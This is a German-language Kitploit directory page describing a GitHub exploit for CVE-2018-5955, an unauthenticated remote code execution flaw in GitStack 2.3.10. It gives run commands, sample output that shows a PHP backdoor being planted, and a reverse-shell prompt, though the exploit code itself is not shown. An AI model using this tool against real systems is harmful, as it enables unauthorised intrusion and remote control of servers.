Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-5955 — Ein Exploit für CVE-2018-5955 GitStack 2.3.10 RCE ohne Authentifizierung | Kitploit
Tools/GitHubGitHub/mikethehash/cve-2018-5955
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRemote-Access-Tool
GitHubmikethehash/cve-2018-5955

CVE-2018-5955

Ein Exploit für CVE-2018-5955 GitStack 2.3.10 RCE ohne Authentifizierung

Repository anzeigen
103vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-5955

Ein Exploit für CVE-2018-5955 GitStack 2.3.10 Unauthenticated RCE

Exploit: GitStack 2.3.10 Unauthenticated Remote Code Execution

Datum: 18.01.2018

Software-Link: https://gitstack.com/

Exploit-Autor: Kacper Szurek

Original-Exploit: https://www.exploit-db.com/exploits/43777

Webseite: https://security.szurek.pl/

Kategorie: remote

CVE: CVE-2018-5955

Exploit modifiziert von MikeTheHash

Datum: 23.06.2023

Neue Funktionen: Interaktive RCE, OS-Erkennung, Reverse-Shell-Funktion, von Python2 an Python3 angepasst

CVE: CVE-2018-5955

Kategorie: remote

HAFTUNGSAUSSCHLUSS

Ich übernehme keine Verantwortung für Ihre Handlungen, da ich es auf GitHub zu Bildungszwecken oder für zertifizierte und autorisierte Penetrationstests veröffentlicht habe.

Verwendung

Abhängigkeiten installieren:

root@kitploit:~
pip install colorama

Dann führen Sie es aus mit:

root@kitploit:~
python3 exploit.py

Funktionen

  • OS-Erkennung
  • Reverse Shell

OS-Erkennung:

Das Betriebssystem wird erkannt, nachdem Sie die CVE ausgenutzt haben. Tatsächlich wird diese Ausgabezeile erscheinen: "[*] OS: $operatingsystem" (Demonstration unten)

root@kitploit:~
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----

Sie können auch "os" eingeben, um herauszufinden, um welches Betriebssystem es sich handelt.

Reverse Shell

Um eine echte Reverse-Shell auf dem Ziel zu erhalten, geben Sie "shell" ein und dann Ihre IP und Ihren Abhörport wie folgt:

root@kitploit:~
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE

Happy Hacking!

Tool herunterladen